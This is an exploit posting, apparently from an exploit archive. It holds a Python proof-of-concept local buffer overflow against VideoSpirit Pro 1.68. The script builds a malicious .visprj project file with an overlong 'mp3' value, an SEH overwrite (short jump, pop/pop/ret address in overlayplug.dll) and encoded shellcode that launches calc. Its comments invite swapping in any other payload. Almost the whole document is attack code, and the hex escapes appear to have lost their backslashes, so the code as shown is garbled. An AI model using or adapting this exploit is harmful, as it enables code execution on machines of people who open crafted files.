VideoSpirit Pro 1.68 Buffer Overflow
Posted on 08 January 2011
# Exploit Title: VideoSpirit Pro v1.68 Local BoF Exploit # Date: 01/08/2011 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsec[at]x-sploited.com # Software Link: http://www.verytools.com/videospirit/download.html # Vulnerable version: v1.68 # Tested on: Windows XP SP3 Eng # Software description # # "VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor, # various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated, # resized and warped. Multiple video/audio clips can be joined together. Converting speed is fast and # the quality of output file is excellent." # Vulnerability info # # VideoSpirit Pro is prone to a buffer overflow when parsing a (.visprj) project file that # contains an overly long "mp3" value. This is because the application fails to properly bounds # check the data before it is passed to strcpy(). #!/usr/bin/python import struct,sys,os banner = ( " ============================================== " " VideoSpirit Pro v1.68 Local BoF PoC " " Author: xsploitedsec URL: http://www.x-sploited.com/ " "============================================== "); print banner; if len(sys.argv) < 2: print (" [!] Error No filename specified Usage: " + os.path.basename(sys.argv[0]) + " <outfile.visprj>"); outfile = "xsploited.visprj"; #default defaultname = 1; else: outfile = sys.argv[1]; defaultname = 0; # msfpayload windows/exec CMD=calc EXITFUNC=seh R | msfencode -e x86/fnstenv_mov # -c 1 -b 'x00x22x0ax0bx1cx0cx2fx21' > /tmp/encoded.txt # [*] x86/fnstenv_mov succeeded with size 222 (iteration=1) calc = ( "x6ax32x59xd9xeexd9x74x24xf4x5bx81x73x13xbf" "xf8x92x62x83xebxfcxe2xf4x43x10x1bx62xbfxf8" "xf2xebx5axc9x40x06x34xaaxa2xe9xedxf4x19x30" "xabx73xe0x4axb0x4fxd8x44x8ex07xa3xa2x13xc4" "xf3x1exbdxd4xb2xa3x70xf5x93xa5x5dx08xc0x35" "x34xaax82xe9xfdxc4x93xb2x34xb8xeaxe7x7fx8c" "xd8x63x6fxa8x19x2axa7x73xcax42xbex2bx71x5e" "xf6x73xa6xe9xbex2exa3x9dx8ex38x3exa3x70xf5" "x93xa5x87x18xe7x96xbcx85x6ax59xc2xdcxe7x80" "xe7x73xcax46xbex2bxf4xe9xb3xb3x19x3axa3xf9" "x41xe9xbbx73x93xb2x36xbcxb6x46xe4xa3xf3x3b" "xe5xa9x6dx82xe7xa7xc8xe9xadx13x14x3fxd5xf9" "x1fxe7x06xf8x92x62xefx90xa3xe9xd0x7fx6dxb7" "x04x06x9cx50x55x90x34xf7x02x65x6dxb7x83xfe" "xeex68x3fx03x72x17xbax43xd5x71xcdx97xf8x62" "xecx07x47x01xdex94xf1x62xb5xf8x92x62"); header = ( "x3Cx76x65x72x73x69x6Fx6Ex20x76x61x6Cx75x65x3Dx22x31x22x20" "x2Fx3Ex0Dx0Ax3Cx74x72x61x63x6Bx3Ex0Dx0Ax20x20x20x20x3Cx74" "x79x70x65x20x76x61x6Cx75x65x3Dx22x30x22x20x2Fx3Ex0Dx0Ax20" "x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x34x22x20" "x2Fx3Ex0Dx0Ax20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65" "x3Dx22x32x22x20x2Fx3Ex0Dx0Ax20x20x20x20x3Cx74x79x70x65x20" "x76x61x6Cx75x65x3Dx22x31x22x20x2Fx3Ex0Dx0Ax20x20x20x20x3C" "x74x79x70x65x20x76x61x6Cx75x65x3Dx22x37x22x20x2Fx3Ex0Dx0A" "x3Cx2Fx74x72x61x63x6Bx3Ex0Dx0Ax3Cx74x72x61x63x6Bx30x20x2F" "x3Ex0Dx0Ax3Cx74x72x61x63x6Bx31x3Ex0Dx0Ax20x20x20x20x3Cx69" "x74x65x6Dx20x6Ex61x6Dx65x3Dx22x42x6Cx75x65x20x68x69x6Cx6C" "x73x2Ex6Ax70x67x22x20x73x65x74x3Dx22x33x22x20x76x61x6Cx75" "x65x3Dx22x30x31x30x30x30x30x30x30x35x39x30x30x30x30x30x30" "x34x33x33x41x35x43x34x34x36x46x36x33x37x35x36x44x36x35x36" "x45x37x34x37x33x32x30x36x31x36x45x36x34x32x30x35x33x36x35" "x37x34x37x34x36x39x36x45x36x37x37x33x35x43x34x31x36x43x36" "x43x32x30x35x35x37x33x36x35x37x32x37x33x35x43x34x34x36x46" "x36x33x37x35x36x44x36x35x36x45x37x34x37x33x35x43x34x44x37" "x39x32x30x35x30x36x39x36x33x37x34x37x35x37x32x36x35x37x33" "x35x43x35x33x36x31x36x44x37x30x36x43x36x35x32x30x35x30x36" "x39x36x33x37x34x37x35x37x32x36x35x37x33x35x43x34x32x36x43" "x37x35x36x35x32x30x36x38x36x39x36x43x36x43x37x33x32x45x36" "x41x37x30x36x37x30x30x30x30x30x30x30x30x30x30x31x45x30x30" "x30x30x30x30x30x33x30x30x30x30x30x30x32x30x30x30x30x30x30" "x30x30x30x30x30x30x30x30x30x30x30x30x30x34x38x34x32x30x30" "x30x30x34x38x34x32x30x30x30x30x38x37x34x33x30x30x30x30x34" "x38x34x32x30x30x30x30x38x37x34x33x30x30x30x30x33x45x34x33" "x30x30x30x30x34x38x34x32x30x30x30x30x33x45x34x33x34x30x30" "x31x30x30x30x30x46x30x30x30x30x30x30x30x46x46x30x30x30x30" "x30x30x46x46x46x46x46x46x46x46x30x32x30x30x30x30x30x30x43" "x38x43x38x43x38x46x46x30x30x30x30x30x30x30x30x30x30x30x30" "x30x30x30x30x30x30x30x30x30x30x30x30x30x33x30x30x30x30x30" "x30x36x45x36x46x30x30x45x45x45x45x45x45x45x45x30x30x30x30" "x30x30x30x30x30x30x22x20x2Fx3Ex0Dx0Ax3Cx2Fx74x72x61x63x6B" "x31x3Ex0Dx0Ax3Cx74x72x61x63x6Bx32x20x2Fx3Ex0Dx0Ax3Cx74x72" "x61x63x6Bx33x20x2Fx3Ex0Dx0Ax3Cx74x72x61x63x6Bx34x20x2Fx3E" "x0Dx0Ax3Cx63x6Cx69x70x20x2Fx3Ex0Dx0Ax3Cx6Fx75x74x70x75x74" "x20x74x79x70x65x6Ex61x6Dx65x3Dx22x41x56x49x22x20x6Bx65x65" "x70x61x73x70x65x63x74x3Dx22x30x22x20x70x72x65x73x65x74x71" "x75x61x6Cx69x74x79x3Dx22x30x22x3Ex0Dx0Ax20x20x20x20x3Cx74" "x79x70x65x30x20x65x6Ex61x62x6Cx65x3Dx22x31x22x3Ex0Dx0Ax20" "x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6D" "x65x3Dx22x6Dx73x6Dx70x65x67x34x76x32x22x20x76x61x6Cx75x65" "x3Dx22x6Dx73x6Dx70x65x67x34x76x32x22x20x2Fx3Ex0Dx0Ax20x20" "x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65" "x3Dx22x33x32x30x2Ax32x34x30x28x34x3Ax33x29x22x20x76x61x6C" "x75x65x3Dx22x33x32x30x2Ax32x34x30x22x20x2Fx3Ex0Dx0Ax20x20" "x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65" "x3Dx22x33x30x22x20x76x61x6Cx75x65x3Dx22x33x30x22x20x2Fx3E" "x0Dx0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20" "x6Ex61x6Dx65x3Dx22x31x36x30x30x30x6Bx22x20x76x61x6Cx75x65" "x3Dx22x31x36x30x30x30x6Bx22x20x2Fx3Ex0Dx0Ax20x20x20x20x3C" "x2Fx74x79x70x65x30x3Ex0Dx0Ax20x20x20x20x3Cx74x79x70x65x31" "x20x65x6Ex61x62x6Cx65x3Dx22x31x22x3Ex0Dx0Ax20x20x20x20x20" "x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x6D" "x70x33x22x20x76x61x6Cx75x65x3Dx22"); footer = ( "x22x20x2Fx3Ex0Dx0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69" "x74x65x6Dx20x6Ex61x6Dx65x3Dx22x31x32x38x6Bx22x20x76x61x6C" "x75x65x3Dx22x31x32x38x6Bx22x20x2Fx3Ex0Dx0Ax20x20x20x20x20" "x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x34" "x34x31x30x30x22x20x76x61x6Cx75x65x3Dx22x34x34x31x30x30x22" "x20x2Fx3Ex0Dx0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74" "x65x6Dx20x6Ex61x6Dx65x3Dx22x32x20x28x53x74x65x72x65x6Fx29" "x22x20x76x61x6Cx75x65x3Dx22x32x22x20x2Fx3Ex0Dx0Ax20x20x20" "x20x3Cx2Fx74x79x70x65x31x3Ex0Dx0Ax20x20x20x20x3Cx74x79x70" "x65x32x20x65x6Ex61x62x6Cx65x3Dx22x30x22x20x2Fx3Ex0Dx0Ax3C" "x2Fx6Fx75x74x70x75x74x3Ex0Dx0A"); payload = "x41" * 104; payload += "xEBx06x90x90"; #short jmp payload += struct.pack("<L",0x100B0B94); #p/p/r - overlayplug.dll (Apps path) payload += "x90" * 24; #small nop sled payload += calc; #plenty of room for whatever payload += "x42" * (5000 - len(payload)); #junk padding finalstr = (header + payload + footer); if defaultname == 1: print(" [!] Defaulting to xsploited.visprj"); print("[*] Creating malicious project file"); try: out_file = open(outfile,'w'); out_file.write(finalstr); out_file.close(); print("[+] File created successfully (" + outfile + ") [-] Exiting... "); except (IOError): print("[!] Error: unable to create file [-] Exiting... ");
